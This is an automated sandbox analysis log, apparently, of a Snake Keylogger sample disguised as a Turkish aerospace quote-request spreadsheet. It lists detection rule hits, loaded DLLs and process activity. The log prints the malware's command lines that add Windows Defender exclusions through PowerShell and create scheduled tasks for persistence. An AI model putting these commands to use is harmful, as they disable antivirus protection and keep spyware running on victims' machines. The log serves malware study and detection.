                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/14@3/3
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: C:\Users\user\AppData\Roaming\WheTgQY.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMutant created: \Sessions\1\BaseNamedObjects\gZshqEzwcLn
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\tmp957E.tmpJump to behavior
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.0000000002AA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeReversingLabs: Detection: 35%
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeVirustotal: Detection: 36%
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile read: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe C:\Users\user\AppData\Roaming\WheTgQY.exe
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
